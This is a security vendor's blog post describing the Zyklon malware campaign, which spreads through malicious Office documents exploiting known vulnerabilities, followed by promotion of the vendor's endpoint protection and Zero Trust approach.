Zyklon malware proliferating via MS Office security loopholes

zyklon malware

Cyber attackers are exploiting three recently uncovered vulnerabilities in MS Office to spread multifunction Zyklon malware, security researchers warn.

The Zyklon malware has been there in existence since 2016, the intention of creating it was to carry out distributed denial of service (DDoS) attacks, log keystrokes, steal passwords, and mine cryptocurrency.

Zyklon malware can do more than just that; it is more capable of executing additional plugins, has the functionality to update and remove itself, and may interact with its command and control (C2) server over The Onion Router (Tor) network is configured to do so.

The Zyklon malware “automatically detects and decrypts the license/serial keys of more than 200 popular pieces of software, including Office, SQL Server, Adobe, and Nero”, and empowers online criminals to hijack bitcoin address clipboards to replace a user’s address with an address controlled by the cybercriminals.

Of late, the Zyklon malware attacks are carried out through spam emails, and thereby, the malware typically arrives with an attached .zip file containing a malicious .doc file.

The primary domains targeted by Zyklon malware are insurance, financial services, and telecommunications. However, the industry experts and researches have warned that organizations in all sectors to stay alert. In their own words from a blog post – “It is highly likely that the threat actors will eventually move outside the scope of their current targeting.”

The malicious .doc file of the Zyklon malware efficiently exploits the known vulnerabilities in Microsoft Office. When it runs in an unsafe environment, the PowerShell-based payload takes over. According to the researchers, the PowerShell script is liable for downloading the last payload from a C2 server to execute it. The three vulnerabilities exploited by the .doc file are Dynamic Data Exchange communication mechanism, CVE-2017-11882, and CVE-2017-8759. “These types of threats show why it is essential to ensure that all software is fully updated.

Zyklon malware has the potential to significantly revenue-generate for the cybercriminals. Online criminals make use of the vulnerabilities in MS Office to install malware, which can be remotely controlled to deliver those attacks, will not be a surprise to many people.

When a business is under Zyklon5 malware attack, it should be ready to counter. Proactive security in place will help handle the situation without any tensions. Comodo Endpoint Security software is the best option to combat Zyklon malware. Comodo AEP or Advanced Endpoint Protection can detect and locate the source of the breach in no time, which is of paramount importance.

Why is Comodo AEP or Advanced Endpoint Protection?

In the present competitive business world, the term “endpoint” has become interchangeable with any device that can connect to a network namely laptops, desktops, smartphones, tablets, and most recently, IoT devices. As endpoints continue to evolve, so are the threats. Sadly, the present antivirus software and firewalls can no longer shield an organization’s changing environment. Endpoints are exposed to a plethora of malicious activity like Zyklon malware.

So how do today’s businesses should protect against threats such as Zyklon malware? Overall, the businesses need to have a better understanding of the evolving risks and how to select the “right” endpoint protection platform (EPP).

Unknown Files That Drive the Change

Unknown files – an unrecognizable executable file that are positively malicious – have grown in numbers in the last 3 to 5 years. According to the researchers conducted by Comodo, at least 300,000 new malicious files are getting detected daily. Dealing with new malware is one of the most critical challenges of any EPP.

Most EPP products use the Default Allow posture, which is an assumptive based trust, as and when dealing with new or unknown files. This method allows files, other than known harmful files, to have unfettered write privilege to system files, which assumes that files not identified as bad must be suitable or safe. As you can imagine, one of the significant problems with a Default Allow security posture is that cybercriminals are continually building new variants to avoid detection from these endpoint solutions. This can leave companies exposed to threats for days, weeks, even months before detected.

Sandbox Testing and further analysis

Many EPP vendors have integrated sandbox technology into their products to fight off malicious software such as Zyklon malware and have had successfully thwarted the hacker attempts. For those unfamiliar, a sandbox is an isolated virtualized environment that mimics an endpoint operation environment to safely execute unknown files, without risking harm to the host device or network.

Nevertheless, this once beneficial solution is beginning to miss its effectiveness. Cybercriminals are creating threats that can detect when a sandbox is being used and automatically take steps to avoid detection. Also, sandboxes are becoming more resource intensive and more complex, slowing down their ability to process threats without hindering productivity.

Zero Trust Architecture – The Need for It

Cybercriminals use the Default Allow approach for their benefit, by making changes in these variants, they enable them to bypass sandboxes, thereby organizations require a perfect solution.

The simple answer is to choose a Zero Trust architecture, where unknown executables are never allowed and continuously tested, without affecting the users’ productivity. To select the right Zero Trust architecture, all the unknown files necessarily be immediately contained and analyzed in the cloud and by human intervention to prevent breaches. In addition to this, the business still needs to work, and users should not face hiccups while working as it might lead to productivity loss or impact. Accomplishing a perfect Zero Trust architecture can be considered as an achievement in business success as it will safeguard the business from vicious online attacks.

Good Practices for Shortlisting an Endpoint Protection Solution

Protecting endpoints from malicious software, intrusions, and cyber-attacks are one of the most critical aspects of protecting a company’s IT resources. The EPP must be part of a holistic IT security approach where network perimeter security solutions ensure the limitations between a service provider’s network and internal network, and endpoint protection further decreases the threats of malicious activities that could negatively impact IT operations.

The first and foremost approach in choosing an Endpoint Protection solution is by determining the requirements of the business. The needs should include compliance, capacity, and scalability, budget, and policies. The next step is to examine the capabilities, and it is not restricted to centralized management, unknown file handling, threat detection, and blocking, file reputation scoring, and verdict and support to achieve a Zero Trust architecture.

Select the Right Endpoint Protection by Running an Effective Proof of Concept:

Besides the above-stated best practices, Gartner lately published a research paper in which they suggest entirely that security and risk management leaders should run a thorough proof of concept to determine which endpoint protection platform is the most suitable accurately.




Leave a comment Your email address will not be published.